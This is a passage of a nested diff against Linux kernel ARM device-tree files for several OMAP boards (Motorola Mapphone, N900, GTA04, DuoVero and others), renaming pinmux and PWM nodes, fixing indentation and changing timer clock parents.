+ 				timing {
+diff --git a/arch/arm/boot/dts/logicpd-torpedo-baseboard.dtsi b/arch/arm/boot/dts/logicpd-torpedo-baseboard.dtsi
+index d3da8b1b473b8..e0cbac500e172 100644
+--- a/arch/arm/boot/dts/logicpd-torpedo-baseboard.dtsi
++++ b/arch/arm/boot/dts/logicpd-torpedo-baseboard.dtsi
+@@ -59,7 +59,7 @@
+ 		};
+ 	};
+ 
+-	pwm10: dmtimer-pwm {
++	pwm10: pwm-10 {
+ 		compatible = "ti,omap-dmtimer-pwm";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pwm_pins>;
+diff --git a/arch/arm/boot/dts/motorola-mapphone-common.dtsi b/arch/arm/boot/dts/motorola-mapphone-common.dtsi
+index c7a1f3ffc48ca..d69f0f4b4990d 100644
+--- a/arch/arm/boot/dts/motorola-mapphone-common.dtsi
++++ b/arch/arm/boot/dts/motorola-mapphone-common.dtsi
+@@ -133,7 +133,7 @@
+ 		dais = <&mcbsp2_port>, <&mcbsp3_port>;
+ 	};
+ 
+-	pwm8: dmtimer-pwm-8 {
++	pwm8: pwm-8 {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&vibrator_direction_pin>;
+ 
+@@ -143,7 +143,7 @@
+ 		ti,clock-source = <0x01>;
+ 	};
+ 
+-	pwm9: dmtimer-pwm-9 {
++	pwm9: pwm-9 {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&vibrator_enable_pin>;
+ 
+@@ -352,13 +352,13 @@
+ &omap4_pmx_core {
+ 
+ 	/* hdmi_hpd.gpio_63 */
+-	hdmi_hpd_gpio: pinmux_hdmi_hpd_pins {
++	hdmi_hpd_gpio: hdmi-hpd-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x098, PIN_INPUT | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	hdq_pins: pinmux_hdq_pins {
++	hdq_pins: hdq-pins {
+ 		pinctrl-single,pins = <
+ 		/* 0x4a100120 hdq_sio.hdq_sio aa27 */
+ 		OMAP4_IOPAD(0x120, PIN_INPUT | MUX_MODE0)
+@@ -366,7 +366,7 @@
+ 	};
+ 
+ 	/* hdmi_cec.hdmi_cec, hdmi_scl.hdmi_scl, hdmi_sda.hdmi_sda */
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)
+ 		OMAP4_IOPAD(0x09c, PIN_INPUT | MUX_MODE0)
+@@ -380,7 +380,7 @@
+ 	 * devices. Off mode value should be tested if we have off mode working
+ 	 * later on.
+ 	 */
+-	mmc3_pins: pinmux_mmc3_pins {
++	mmc3_pins: mmc3-pins {
+ 		pinctrl-single,pins = <
+ 		/* 0x4a10008e gpmc_wait2.gpio_100 d23 */
+ 		OMAP4_IOPAD(0x08e, PIN_INPUT | MUX_MODE3)
+@@ -406,40 +406,40 @@
+ 	};
+ 
+ 	/* gpmc_ncs0.gpio_50 */
+-	poweroff_gpio: pinmux_poweroff_pins {
++	poweroff_gpio: poweroff-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x074, PIN_OUTPUT_PULLUP | MUX_MODE3)
+ 		>;
+ 	};
+ 
+ 	/* kpd_row0.gpio_178 */
+-	tmp105_irq: pinmux_tmp105_irq {
++	tmp105_irq: tmp105-irq-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x18e, PIN_INPUT_PULLUP | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	usb_gpio_mux_sel1: pinmux_usb_gpio_mux_sel1_pins {
++	usb_gpio_mux_sel1: usb-gpio-mux-sel1-pins {
+ 		/* gpio_60 */
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x088, PIN_OUTPUT | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	touchscreen_pins: pinmux_touchscreen_pins {
++	touchscreen_pins: touchscreen-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x180, PIN_OUTPUT | MUX_MODE3)
+ 		OMAP4_IOPAD(0x1a0, PIN_INPUT_PULLUP | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	als_proximity_pins: pinmux_als_proximity_pins {
++	als_proximity_pins: als-proximity-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x18c, PIN_INPUT_PULLUP | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	usb_mdm6600_pins: pinmux_usb_mdm6600_pins {
++	usb_mdm6600_pins: usb-mdm6600-pins {
+ 		pinctrl-single,pins = <
+ 		/* enable 0x4a1000d8 usbb1_ulpitll_dat7.gpio_95 ag16 */
+ 		OMAP4_IOPAD(0x0d8, PIN_INPUT | MUX_MODE3)
+@@ -476,7 +476,7 @@
+ 		>;
+ 	};
+ 
+-	usb_ulpi_pins: pinmux_usb_ulpi_pins {
++	usb_ulpi_pins: usb-ulpi-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x196, MUX_MODE7)
+ 		OMAP4_IOPAD(0x198, MUX_MODE7)
+@@ -496,7 +496,7 @@
+ 	};
+ 
+ 	/* usb0_otg_dp and usb0_otg_dm */
+-	usb_utmi_pins: pinmux_usb_utmi_pins {
++	usb_utmi_pins: usb-utmi-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x196, PIN_INPUT | MUX_MODE0)
+ 		OMAP4_IOPAD(0x198, PIN_INPUT | MUX_MODE0)
+@@ -521,7 +521,7 @@
+ 	 * when not used. If needed, we can add rts pin remux later based
+ 	 * on power measurements.
+ 	 */
+-	uart1_pins: pinmux_uart1_pins {
++	uart1_pins: uart1-pins {
+ 		pinctrl-single,pins = <
+ 		/* 0x4a10013c mcspi1_cs2.uart1_cts ag23 */
+ 		OMAP4_IOPAD(0x13c, PIN_INPUT_PULLUP | MUX_MODE1)
+@@ -538,7 +538,7 @@
+ 	};
+ 
+ 	/* uart3_tx_irtx and uart3_rx_irrx */
+-	uart3_pins: pinmux_uart3_pins {
++	uart3_pins: uart3-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x196, MUX_MODE7)
+ 		OMAP4_IOPAD(0x198, MUX_MODE7)
+@@ -557,7 +557,7 @@
+ 		>;
+ 	};
+ 
+-	uart4_pins: pinmux_uart4_pins {
++	uart4_pins: uart4-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x15c, PIN_INPUT | MUX_MODE0)		/* uart4_rx */
+ 		OMAP4_IOPAD(0x15e, PIN_OUTPUT | MUX_MODE0)		/* uart4_tx */
+@@ -566,7 +566,7 @@
+ 		>;
+ 	};
+ 
+-	mcbsp2_pins: pinmux_mcbsp2_pins {
++	mcbsp2_pins: mcbsp2-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x0f6, PIN_INPUT | MUX_MODE0)	/* abe_mcbsp2_clkx */
+ 		OMAP4_IOPAD(0x0f8, PIN_INPUT | MUX_MODE0)	/* abe_mcbsp2_dr */
+@@ -575,7 +575,7 @@
+ 		>;
+ 	};
+ 
+-	mcbsp3_pins: pinmux_mcbsp3_pins {
++	mcbsp3_pins: mcbsp3-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x106, PIN_INPUT | MUX_MODE1)	/* abe_mcbsp3_dr */
+ 		OMAP4_IOPAD(0x108, PIN_OUTPUT | MUX_MODE1)	/* abe_mcbsp3_dx */
+@@ -584,13 +584,13 @@
+ 		>;
+ 	};
+ 
+-	vibrator_direction_pin: pinmux_vibrator_direction_pin {
++	vibrator_direction_pin: vibrator-direction-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x1ce, PIN_OUTPUT | MUX_MODE1)	/* dmtimer8_pwm_evt (gpio_27) */
+ 		>;
+ 	};
+ 
+-	vibrator_enable_pin: pinmux_vibrator_enable_pin {
++	vibrator_enable_pin: vibrator-enable-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0X1d0, PIN_OUTPUT | MUX_MODE1)	/* dmtimer9_pwm_evt (gpio_28) */
+ 		>;
+@@ -598,7 +598,7 @@
+ };
+ 
+ &omap4_pmx_wkup {
+-	usb_gpio_mux_sel2: pinmux_usb_gpio_mux_sel2_pins {
++	usb_gpio_mux_sel2: usb-gpio-mux-sel2-pins {
+ 		/* gpio_wk0 */
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x040, PIN_OUTPUT_PULLDOWN | MUX_MODE3)
+@@ -614,12 +614,12 @@
+ /* Configure pwm clock source for timers 8 & 9 */
+ &timer8 {
+ 	assigned-clocks = <&abe_clkctrl OMAP4_TIMER8_CLKCTRL 24>;
+-	assigned-clock-parents = <&sys_clkin_ck>;
++	assigned-clock-parents = <&sys_32k_ck>;
+ };
+ 
+ &timer9 {
+ 	assigned-clocks = <&l4_per_clkctrl OMAP4_TIMER9_CLKCTRL 24>;
+-	assigned-clock-parents = <&sys_clkin_ck>;
++	assigned-clock-parents = <&sys_32k_ck>;
+ };
+ 
+ /*
+diff --git a/arch/arm/boot/dts/omap-gpmc-smsc911x.dtsi b/arch/arm/boot/dts/omap-gpmc-smsc911x.dtsi
+index ce6c235f68ec6..3046ec572632d 100644
+--- a/arch/arm/boot/dts/omap-gpmc-smsc911x.dtsi
++++ b/arch/arm/boot/dts/omap-gpmc-smsc911x.dtsi
+@@ -8,9 +8,9 @@
+ 
+ / {
+ 	vddvario: regulator-vddvario {
+-		  compatible = "regulator-fixed";
+-		  regulator-name = "vddvario";
+-		  regulator-always-on;
++		compatible = "regulator-fixed";
++		regulator-name = "vddvario";
++		regulator-always-on;
+ 	};
+ 
+ 	vdd33a: regulator-vdd33a {
+diff --git a/arch/arm/boot/dts/omap-gpmc-smsc9221.dtsi b/arch/arm/boot/dts/omap-gpmc-smsc9221.dtsi
+index e7534fe9c53cf..bc8961f3690f0 100644
+--- a/arch/arm/boot/dts/omap-gpmc-smsc9221.dtsi
++++ b/arch/arm/boot/dts/omap-gpmc-smsc9221.dtsi
+@@ -12,9 +12,9 @@
+ 
+ / {
+ 	vddvario: regulator-vddvario {
+-		  compatible = "regulator-fixed";
+-		  regulator-name = "vddvario";
+-		  regulator-always-on;
++		compatible = "regulator-fixed";
++		regulator-name = "vddvario";
++		regulator-always-on;
+ 	};
+ 
+ 	vdd33a: regulator-vdd33a {
+diff --git a/arch/arm/boot/dts/omap3-cm-t3517.dts b/arch/arm/boot/dts/omap3-cm-t3517.dts
+index 3b8349094baa6..f25c0a84a190c 100644
+--- a/arch/arm/boot/dts/omap3-cm-t3517.dts
++++ b/arch/arm/boot/dts/omap3-cm-t3517.dts
+@@ -11,12 +11,12 @@
+ 	model = "CompuLab CM-T3517";
+ 	compatible = "compulab,omap3-cm-t3517", "ti,am3517", "ti,omap3";
+ 
+-	vmmc:  regulator-vmmc {
+-                compatible = "regulator-fixed";
+-                regulator-name = "vmmc";
+-                regulator-min-microvolt = <3300000>;
+-                regulator-max-microvolt = <3300000>;
+-        };
++	vmmc: regulator-vmmc {
++		compatible = "regulator-fixed";
++		regulator-name = "vmmc";
++		regulator-min-microvolt = <3300000>;
++		regulator-max-microvolt = <3300000>;
++	};
+ 
+ 	wl12xx_vmmc2: wl12xx_vmmc2 {
+ 		compatible = "regulator-fixed";
+diff --git a/arch/arm/boot/dts/omap3-cpu-thermal.dtsi b/arch/arm/boot/dts/omap3-cpu-thermal.dtsi
+index 0da759f8e2c2d..7dd2340bc5e45 100644
+--- a/arch/arm/boot/dts/omap3-cpu-thermal.dtsi
++++ b/arch/arm/boot/dts/omap3-cpu-thermal.dtsi
+@@ -12,8 +12,7 @@ cpu_thermal: cpu-thermal {
+ 	polling-delay = <1000>; /* milliseconds */
+ 	coefficients = <0 20000>;
+ 
+-			/* sensor       ID */
+-	thermal-sensors = <&bandgap     0>;
++	thermal-sensors = <&bandgap>;
+ 
+ 	cpu_trips: trips {
+ 		cpu_alert0: cpu_alert {
+diff --git a/arch/arm/boot/dts/omap3-gta04.dtsi b/arch/arm/boot/dts/omap3-gta04.dtsi
+index 2dbee248a126f..e0be0fb23f80f 100644
+--- a/arch/arm/boot/dts/omap3-gta04.dtsi
++++ b/arch/arm/boot/dts/omap3-gta04.dtsi
+@@ -147,7 +147,7 @@
+ 		pinctrl-0 = <&backlight_pins>;
+ 	};
+ 
+-	pwm11: dmtimer-pwm {
++	pwm11: pwm-11 {
+ 		compatible = "ti,omap-dmtimer-pwm";
+ 		ti,timers = <&timer11>;
+ 		#pwm-cells = <3>;
+@@ -332,7 +332,7 @@
+ 			OMAP3_CORE1_IOPAD(0x2108, PIN_OUTPUT | MUX_MODE0)   /* dss_data22.dss_data22 */
+ 			OMAP3_CORE1_IOPAD(0x210a, PIN_OUTPUT | MUX_MODE0)   /* dss_data23.dss_data23 */
+ 		>;
+-       };
++	};
+ 
+ 	gps_pins: pinmux_gps_pins {
+ 		pinctrl-single,pins = <
+@@ -869,8 +869,8 @@
+ };
+ 
+ &hdqw1w {
+-        pinctrl-names = "default";
+-        pinctrl-0 = <&hdq_pins>;
++	pinctrl-names = "default";
++	pinctrl-0 = <&hdq_pins>;
+ };
+ 
+ /* image signal processor within OMAP3 SoC */
+diff --git a/arch/arm/boot/dts/omap3-ldp.dts b/arch/arm/boot/dts/omap3-ldp.dts
+index 36fc8805e0c15..85f33bbb566f9 100644
+--- a/arch/arm/boot/dts/omap3-ldp.dts
++++ b/arch/arm/boot/dts/omap3-ldp.dts
+@@ -301,5 +301,5 @@
+ 
+ &vaux1 {
+ 	/* Needed for ads7846 */
+-        regulator-name = "vcc";
++	regulator-name = "vcc";
+ };
+diff --git a/arch/arm/boot/dts/omap3-n900.dts b/arch/arm/boot/dts/omap3-n900.dts
+index dd79715564498..89ab08d83261a 100644
+--- a/arch/arm/boot/dts/omap3-n900.dts
++++ b/arch/arm/boot/dts/omap3-n900.dts
+@@ -156,7 +156,7 @@
+ 		io-channel-names = "temp", "bsi", "vbat";
+ 	};
+ 
+-	pwm9: dmtimer-pwm {
++	pwm9: pwm-9 {
+ 		compatible = "ti,omap-dmtimer-pwm";
+ 		#pwm-cells = <3>;
+ 		ti,timers = <&timer9>;
+@@ -236,27 +236,27 @@
+ 		pinctrl-single,pins = <
+ 
+ 			/* address lines */
+-                        OMAP3_CORE1_IOPAD(0x207a, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a1.gpmc_a1 */
+-                        OMAP3_CORE1_IOPAD(0x207c, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a2.gpmc_a2 */
+-                        OMAP3_CORE1_IOPAD(0x207e, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a3.gpmc_a3 */
++			OMAP3_CORE1_IOPAD(0x207a, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a1.gpmc_a1 */
++			OMAP3_CORE1_IOPAD(0x207c, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a2.gpmc_a2 */
++			OMAP3_CORE1_IOPAD(0x207e, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a3.gpmc_a3 */
+ 
+ 			/* data lines, gpmc_d0..d7 not muxable according to TRM */
+-                        OMAP3_CORE1_IOPAD(0x209e, PIN_INPUT | MUX_MODE0)        /* gpmc_d8.gpmc_d8 */
+-                        OMAP3_CORE1_IOPAD(0x20a0, PIN_INPUT | MUX_MODE0)        /* gpmc_d9.gpmc_d9 */
+-                        OMAP3_CORE1_IOPAD(0x20a2, PIN_INPUT | MUX_MODE0)        /* gpmc_d10.gpmc_d10 */
+-                        OMAP3_CORE1_IOPAD(0x20a4, PIN_INPUT | MUX_MODE0)        /* gpmc_d11.gpmc_d11 */
+-                        OMAP3_CORE1_IOPAD(0x20a6, PIN_INPUT | MUX_MODE0)        /* gpmc_d12.gpmc_d12 */
+-                        OMAP3_CORE1_IOPAD(0x20a8, PIN_INPUT | MUX_MODE0)        /* gpmc_d13.gpmc_d13 */
+-                        OMAP3_CORE1_IOPAD(0x20aa, PIN_INPUT | MUX_MODE0)        /* gpmc_d14.gpmc_d14 */
+-                        OMAP3_CORE1_IOPAD(0x20ac, PIN_INPUT | MUX_MODE0)        /* gpmc_d15.gpmc_d15 */
++			OMAP3_CORE1_IOPAD(0x209e, PIN_INPUT | MUX_MODE0)        /* gpmc_d8.gpmc_d8 */
++			OMAP3_CORE1_IOPAD(0x20a0, PIN_INPUT | MUX_MODE0)        /* gpmc_d9.gpmc_d9 */
++			OMAP3_CORE1_IOPAD(0x20a2, PIN_INPUT | MUX_MODE0)        /* gpmc_d10.gpmc_d10 */
++			OMAP3_CORE1_IOPAD(0x20a4, PIN_INPUT | MUX_MODE0)        /* gpmc_d11.gpmc_d11 */
++			OMAP3_CORE1_IOPAD(0x20a6, PIN_INPUT | MUX_MODE0)        /* gpmc_d12.gpmc_d12 */
++			OMAP3_CORE1_IOPAD(0x20a8, PIN_INPUT | MUX_MODE0)        /* gpmc_d13.gpmc_d13 */
++			OMAP3_CORE1_IOPAD(0x20aa, PIN_INPUT | MUX_MODE0)        /* gpmc_d14.gpmc_d14 */
++			OMAP3_CORE1_IOPAD(0x20ac, PIN_INPUT | MUX_MODE0)        /* gpmc_d15.gpmc_d15 */
+ 
+ 			/*
+ 			 * gpmc_ncs0, gpmc_nadv_ale, gpmc_noe, gpmc_nwe, gpmc_wait0 not muxable
+ 			 * according to TRM. OneNAND seems to require PIN_INPUT on clock.
+ 			 */
+-                        OMAP3_CORE1_IOPAD(0x20b0, PIN_OUTPUT | MUX_MODE0)       /* gpmc_ncs1.gpmc_ncs1 */
+-                        OMAP3_CORE1_IOPAD(0x20be, PIN_INPUT | MUX_MODE0)        /* gpmc_clk.gpmc_clk */
+-		>;
++			OMAP3_CORE1_IOPAD(0x20b0, PIN_OUTPUT | MUX_MODE0)       /* gpmc_ncs1.gpmc_ncs1 */
++			OMAP3_CORE1_IOPAD(0x20be, PIN_INPUT | MUX_MODE0)        /* gpmc_clk.gpmc_clk */
++			>;
+ 	};
+ 
+ 	i2c1_pins: pinmux_i2c1_pins {
+@@ -738,12 +738,12 @@
+ 
+ 	si4713: si4713@63 {
+ 		compatible = "silabs,si4713";
+-                reg = <0x63>;
++		reg = <0x63>;
+ 
+-                interrupts-extended = <&gpio2 21 IRQ_TYPE_EDGE_FALLING>; /* 53 */
+-                reset-gpios = <&gpio6 3 GPIO_ACTIVE_HIGH>; /* 163 */
+-                vio-supply = <&vio>;
+-                vdd-supply = <&vaux1>;
++		interrupts-extended = <&gpio2 21 IRQ_TYPE_EDGE_FALLING>; /* 53 */
++		reset-gpios = <&gpio6 3 GPIO_ACTIVE_HIGH>; /* 163 */
++		vio-supply = <&vio>;
++		vdd-supply = <&vaux1>;
+ 	};
+ 
+ 	bq24150a: bq24150a@6b {
+diff --git a/arch/arm/boot/dts/omap3-zoom3.dts b/arch/arm/boot/dts/omap3-zoom3.dts
+index 0482676d18306..ce58b1f208e81 100644
+--- a/arch/arm/boot/dts/omap3-zoom3.dts
++++ b/arch/arm/boot/dts/omap3-zoom3.dts
+@@ -23,9 +23,9 @@
+ 	};
+ 
+ 	vddvario: regulator-vddvario {
+-		  compatible = "regulator-fixed";
+-		  regulator-name = "vddvario";
+-		  regulator-always-on;
++		compatible = "regulator-fixed";
++		regulator-name = "vddvario";
++		regulator-always-on;
+ 	};
+ 
+ 	vdd33a: regulator-vdd33a {
+@@ -84,28 +84,28 @@
+ 
+ 	uart1_pins: pinmux_uart1_pins {
+ 		pinctrl-single,pins = <
+-                        OMAP3_CORE1_IOPAD(0x2180, PIN_INPUT | MUX_MODE0)		/* uart1_cts.uart1_cts */
+-                        OMAP3_CORE1_IOPAD(0x217e, PIN_OUTPUT | MUX_MODE0)		/* uart1_rts.uart1_rts */
+-                        OMAP3_CORE1_IOPAD(0x2182, WAKEUP_EN | PIN_INPUT | MUX_MODE0) /* uart1_rx.uart1_rx */
+-                        OMAP3_CORE1_IOPAD(0x217c, PIN_OUTPUT | MUX_MODE0)		/* uart1_tx.uart1_tx */
++			OMAP3_CORE1_IOPAD(0x2180, PIN_INPUT | MUX_MODE0)		/* uart1_cts.uart1_cts */
++			OMAP3_CORE1_IOPAD(0x217e, PIN_OUTPUT | MUX_MODE0)		/* uart1_rts.uart1_rts */
++			OMAP3_CORE1_IOPAD(0x2182, WAKEUP_EN | PIN_INPUT | MUX_MODE0) /* uart1_rx.uart1_rx */
++			OMAP3_CORE1_IOPAD(0x217c, PIN_OUTPUT | MUX_MODE0)		/* uart1_tx.uart1_tx */
+ 		>;
+ 	};
+ 
+ 	uart2_pins: pinmux_uart2_pins {
+ 		pinctrl-single,pins = <
+-                        OMAP3_CORE1_IOPAD(0x2174, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts */
+-                        OMAP3_CORE1_IOPAD(0x2176, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
+-                        OMAP3_CORE1_IOPAD(0x217a, PIN_INPUT | MUX_MODE0)		/* uart2_rx.uart2_rx */
+-                        OMAP3_CORE1_IOPAD(0x2178, PIN_OUTPUT | MUX_MODE0)		/* uart2_tx.uart2_tx */
++			OMAP3_CORE1_IOPAD(0x2174, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts */
++			OMAP3_CORE1_IOPAD(0x2176, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
++			OMAP3_CORE1_IOPAD(0x217a, PIN_INPUT | MUX_MODE0)		/* uart2_rx.uart2_rx */
++			OMAP3_CORE1_IOPAD(0x2178, PIN_OUTPUT | MUX_MODE0)		/* uart2_tx.uart2_tx */
+ 		>;
+ 	};
+ 
+ 	uart3_pins: pinmux_uart3_pins {
+ 		pinctrl-single,pins = <
+-                        OMAP3_CORE1_IOPAD(0x219a, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* uart3_cts_rctx.uart3_cts_rctx */
+-                        OMAP3_CORE1_IOPAD(0x219c, PIN_OUTPUT | MUX_MODE0)		/* uart3_rts_sd.uart3_rts_sd */
+-                        OMAP3_CORE1_IOPAD(0x219e, PIN_INPUT | MUX_MODE0)		/* uart3_rx_irrx.uart3_rx_irrx */
+-                        OMAP3_CORE1_IOPAD(0x21a0, PIN_OUTPUT | MUX_MODE0)		/* uart3_tx_irtx.uart3_tx_irtx */
++			OMAP3_CORE1_IOPAD(0x219a, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* uart3_cts_rctx.uart3_cts_rctx */
++			OMAP3_CORE1_IOPAD(0x219c, PIN_OUTPUT | MUX_MODE0)		/* uart3_rts_sd.uart3_rts_sd */
++			OMAP3_CORE1_IOPAD(0x219e, PIN_INPUT | MUX_MODE0)		/* uart3_rx_irrx.uart3_rx_irrx */
++			OMAP3_CORE1_IOPAD(0x21a0, PIN_OUTPUT | MUX_MODE0)		/* uart3_tx_irtx.uart3_tx_irtx */
+ 		>;
+ 	};
+ 
+@@ -205,22 +205,22 @@
+ };
+ 
+ &uart1 {
+-       pinctrl-names = "default";
+-       pinctrl-0 = <&uart1_pins>;
++	pinctrl-names = "default";
++	pinctrl-0 = <&uart1_pins>;
+ };
+ 
+ &uart2 {
+-       pinctrl-names = "default";
+-       pinctrl-0 = <&uart2_pins>;
++	pinctrl-names = "default";
++	pinctrl-0 = <&uart2_pins>;
+ };
+ 
+ &uart3 {
+-       pinctrl-names = "default";
+-       pinctrl-0 = <&uart3_pins>;
++	pinctrl-names = "default";
++	pinctrl-0 = <&uart3_pins>;
+ };
+ 
+ &uart4 {
+-       status = "disabled";
++	status = "disabled";
+ };
+ 
+ &usb_otg_hs {
+diff --git a/arch/arm/boot/dts/omap4-cpu-thermal.dtsi b/arch/arm/boot/dts/omap4-cpu-thermal.dtsi
+index 4d7eeb133dadd..d484ec1e4fd86 100644
+--- a/arch/arm/boot/dts/omap4-cpu-thermal.dtsi
++++ b/arch/arm/boot/dts/omap4-cpu-thermal.dtsi
+@@ -12,21 +12,24 @@ cpu_thermal: cpu_thermal {
+ 	polling-delay-passive = <250>; /* milliseconds */
+ 	polling-delay = <1000>; /* milliseconds */
+ 
+-			/* sensor       ID */
+-        thermal-sensors = <&bandgap     0>;
++	/*
++	 * See 44xx files for single sensor addressing, omap5 and dra7 need
++	 * also sensor ID for addressing.
++	 */
++	thermal-sensors = <&bandgap     0>;
+ 
+ 	cpu_trips: trips {
+-                cpu_alert0: cpu_alert {
+-                        temperature = <100000>; /* millicelsius */
+-                        hysteresis = <2000>; /* millicelsius */
+-                        type = "passive";
+-                };
+-                cpu_crit: cpu_crit {
+-                        temperature = <125000>; /* millicelsius */
+-                        hysteresis = <2000>; /* millicelsius */
+-                        type = "critical";
+-                };
+-        };
++		cpu_alert0: cpu_alert {
++			temperature = <100000>; /* millicelsius */
++			hysteresis = <2000>; /* millicelsius */
++			type = "passive";
++		};
++		cpu_crit: cpu_crit {
++			temperature = <125000>; /* millicelsius */
++			hysteresis = <2000>; /* millicelsius */
++			type = "critical";
++		};
++	};
+ 
+ 	cpu_cooling_maps: cooling-maps {
+ 		map0 {
+diff --git a/arch/arm/boot/dts/omap4-duovero-parlor.dts b/arch/arm/boot/dts/omap4-duovero-parlor.dts
+index b294c22177cbf..6d1beb453234e 100644
+--- a/arch/arm/boot/dts/omap4-duovero-parlor.dts
++++ b/arch/arm/boot/dts/omap4-duovero-parlor.dts
+@@ -62,33 +62,33 @@
+ 			&smsc_pins
+ 	>;
+ 
+-	led_pins: pinmux_led_pins {
++	led_pins: led-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x116, PIN_OUTPUT | MUX_MODE3)		/* abe_dmic_din3.gpio_122 */
+ 		>;
+ 	};
+ 
+-	button_pins: pinmux_button_pins {
++	button_pins: button-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x114, PIN_INPUT_PULLUP | MUX_MODE3)	/* abe_dmic_din2.gpio_121 */
+ 		>;
+ 	};
+ 
+-	i2c2_pins: pinmux_i2c2_pins {
++	i2c2_pins: i2c2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x126, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_scl */
+ 			OMAP4_IOPAD(0x128, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	smsc_pins: pinmux_smsc_pins {
++	smsc_pins: smsc-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x068, PIN_INPUT | MUX_MODE3)		/* gpmc_a20.gpio_44: IRQ */
+ 			OMAP4_IOPAD(0x06a, PIN_INPUT_PULLUP | MUX_MODE3)	/* gpmc_a21.gpio_45: nReset */
+@@ -96,7 +96,7 @@
+ 		>;
+ 	};
+ 
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x098, PIN_INPUT | MUX_MODE3)		/* hdmi_hpd.gpio_63 */
+ 			OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)		/* hdmi_cec.hdmi_cec */
+diff --git a/arch/arm/boot/dts/omap4-duovero.dtsi b/arch/arm/boot/dts/omap4-duovero.dtsi
+index 805dfd40030dc..b8af455b411a9 100644
+--- a/arch/arm/boot/dts/omap4-duovero.dtsi
++++ b/arch/arm/boot/dts/omap4-duovero.dtsi
+@@ -73,14 +73,14 @@
+ 			&hsusbb1_pins
+ 	>;
+ 
+-	twl6040_pins: pinmux_twl6040_pins {
++	twl6040_pins: twl6040-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x166, PIN_OUTPUT | MUX_MODE3)		/* usbb2_ulpitll_nxt.gpio_160 */
+ 			OMAP4_IOPAD(0x1a0, PIN_INPUT | MUX_MODE0)		/* sys_nirq2.sys_nirq2 */
+ 		>;
+ 	};
+ 
+-	mcbsp1_pins: pinmux_mcbsp1_pins {
++	mcbsp1_pins: mcbsp1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0fe, PIN_INPUT | MUX_MODE0)		/* abe_mcbsp1_clkx.abe_mcbsp1_clkx */
+ 			OMAP4_IOPAD(0x100, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* abe_mcbsp1_dr.abe_mcbsp1_dr */
+@@ -89,7 +89,7 @@
+ 		>;
+ 	};
+ 
+-	hsusbb1_pins: pinmux_hsusbb1_pins {
++	hsusbb1_pins: hsusbb1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0c2, PIN_INPUT_PULLDOWN | MUX_MODE4)	/* usbb1_ulpitll_clk.usbb1_ulpiphy_clk */
+ 			OMAP4_IOPAD(0x0c4, PIN_OUTPUT | MUX_MODE4)		/* usbb1_ulpitll_stp.usbb1_ulpiphy_stp */
+@@ -106,34 +106,34 @@
+ 		>;
+ 	};
+ 
+-	hsusb1phy_pins: pinmux_hsusb1phy_pins {
++	hsusb1phy_pins: hsusb1phy-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x08c, PIN_OUTPUT | MUX_MODE3)		/* gpmc_wait1.gpio_62 */
+ 		>;
+ 	};
+ 
